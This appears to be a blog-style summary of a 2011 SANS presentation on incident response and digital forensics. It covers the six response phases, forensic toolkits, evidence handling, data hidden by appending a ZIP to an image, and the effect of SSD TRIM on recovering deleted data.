fd53

Incident Handling, Forensics and Hacking Techniques

/ 7 min read

Source Presentation

This SANS Incident Handling & Forensics presentation, delivered in October 2011, provides a comprehensive walkthrough of how organizations should prepare for, identify, contain, and recover from security incidents. It combines process discipline with practical forensic techniques and tooling, emphasizing that methodical response and rigorous evidence handling are the foundations of effective incident management.

About the Presenter

Matthew J. Harmon, Owner of IT Risk, Ltd., LLC, served as a Community Instructor with SANS, Incident Handler, Penetration Tester, Standards Developer within ISO/ITU, IT Auditor, Security Consultant and Researcher, and Risk Analyst. Certifications: GCIH, GSEC, CISSP, CISA, ISO 27001 Lead Auditor. SANS courses taught included SEC 504 “Hacker Techniques, Exploits and Incident Handling,” SEC 464 “Hacker Detection for Systems Administrators” (with Quarterly Continuing Education and Human Sensor Network), and SEC 401 “Security Essentials.”

Incident Response Strategy

Most of the time, responders are called in after an incident or event has already begun. The first steps must be to identify the existing Incident Response Plan and determine who is the Incident Coordinator. If no incident response plan exists, that becomes the first lesson learned.

Core Concepts

  • Don’t Panic! Remain Calm.
  • Take comprehensive notes. If you don’t have enough time to take notes, you are moving too fast. Slow down. Take a deep breath.
  • Get help, immediately. Work in 2x2 pairs.
  • Enforce a need-to-know policy.
  • Use Out-of-Band Communication.
  • Contain the incident and prevent more damage.
  • Make a bit-by-bit backup. Never operate on the original source.
  • Eradicate the attacker and their hold.
  • Get back to business.
  • Learn from mistakes made.

The Six Phases of Incident Response

Preparation – Getting ready to counter an attack. This involves establishing policies, procedures and getting management buy-in; establishing network and traffic baselines (watching for gambling, social media, movies, or harmful activity); setting notification guidelines for media; and identifying internal/external CIRTs, CERT contacts, and law enforcement officer (LEO) contacts.

Identification – Determining if an event or incident has occurred. An event has no correlating logs and minimal impact. An incident has corroborating evidence and potential for harm. Responders must verify system configuration, identify failures, declare an incident early so containment can begin, begin chain-of-custody (always working in 2x2 pairs), and notify management to begin CIRT coordination.

Containment – Limiting the scope of damage and stopping the bleeding. Back up the system with a bit-by-bit copy to new media. Never operate from the original data source. Determine risk to continued operations. Keep a low profile, but change passwords on compromised systems and dependent systems.

Eradication – Isolating the attack, determining vectors and exploited vulnerabilities. Implement protection measures to treat attack vectors through network and firewall filters, renaming or re-IPing systems, and if a system cannot be trusted, rebuilding on a more hardened platform. Identify additional vulnerabilities. Locate a clean backup and prepare for recovery.

Recovery – Returning the system to an operational state. Restore, validate, and prevent future attacks. After management has decided to bring the system back into production, monitor for back doors and other attempted exploits.

Lessons Learned – How to prevent this from happening again. Determine the root cause of the attack and what can be done to improve operations to limit risk. Produce a detailed incident report and circulate to appropriate management. Implement changes as approved by management.

Forensic Toolkits

SANS Investigative Forensic Toolkit (SIFT) Workstation

Developed by SANS, the SIFT Workstation comes loaded with forensic tools ready to go. It supports images acquired with Expert Witness, RAW (dd), and Advanced Forensic Format (AFF). Key tools include The Sleuth Kit and associated GUIs for filesystem and disk analysis, log2timeline for timeline generation, Pasco for web history examination, and the Volatility Framework for memory analysis, among many more. Covered in SEC 408 and SEC 508.

Download: http://computer-forensics.sans.org/community/downloads

BackTrack

BackTrack by Offensive Computing is focused on penetration, not analysis. It contains many of the same tools (under Forensics) but is not as Incident Handler friendly. Notable tools include Metasploit, Kismet, Ophcrack, Wireshark, and BeEF (Browser Exploit Framework). Covered extensively in SEC 504.

Download: http://www.backtrack-linux.org

Computer Forensics Steps

  1. What are you investigating? – Scenarios include malware, malicious insider or espionage, phishing, and criminal investigation.
  2. Document the Scene – Documentation is key. Before touching anything, use your pen and notebook. Photograph, sketch, and label everything. Take copious notes with date and time. These may end up in court.
  3. Identify Data Sources – Forensics are both in-person and remote. Data sources include servers, workstations, PDAs and smartphones, backups, and network devices such as routers and switches – and people. Logs are your friend; logs build a timeline and give insight. Intrusion Detection Systems, firewalls, and switch ports are all sources.
  4. Preserve the Evidence – Data extraction occurs both before and after pulling the plug, using methods such as in-line drive duplication and USB imaging with DD (Unix), EnCase by Guidance Software, or FTK (Forensic Toolkit) by Access Data. Backup data and NEVER use the original source. Maintain chain-of-custody, checksums, and photographs.
  5. Analyze the Collected Data – Some data will be in log format, timestamped, formatted, and easily translated. Most data will be “hidden” or abstracted. Process, procedures, and tools make this easier. Understanding how technology works and is integrated into business is key.
  6. Present Findings – Consider the audience: local law enforcement, FBI, Secret Service, corporate Legal, HR, Audit, or InfoSec. Make your case and state your conclusion clearly.

Hiding Data Intentionally

Despite what CSI might suggest, you cannot “enhance the pixels” – but you can store data inside pictures. An image file can contain a ZIP file appended to it. This is not steganography; it exploits how file formats work.

File formats are designated by magic numbers, not file extensions. Extensions like .jpg and .zip are for humans only. A JPEG with a ZIP appended at the end works because each format’s parser reads from its expected position. Gary Kessler maintains a comprehensive reference of file signatures at http://www.garykessler.net/library/file_sigs.html.

Hiding Data Accidentally: Solid State Drives

Solid State Drives (SSDs) bring new questions to forensic activities. New models of SSD come with the TRIM function. Windows 7, Windows Server 2008, and Linux kernel 2.6.33 are TRIM compatible. TRIM performs “garbage collection,” essentially defeating forensic activities by zeroing data and complicating drive wiping. The presentation illustrated the difference between SSD behavior without TRIM (where deleted data remains recoverable) and with TRIM (where the drive proactively zeros freed blocks).

SANS Course Information

Contact and Resources

Matthew J. Harmon – +1 612/987.0115 – matthew@itriskltd.com – IT Risk, Ltd., LLC – http://www.itriskltd.com

The SANS Institute: http://www.sans.org | http://computer-forensics.sans.org/ | http://pen-testing.sans.org

This work is licensed under the Creative Commons Attribution-NonCommercial 3.0 Unported License (http://creativecommons.org/licenses/by-nc/3.0/).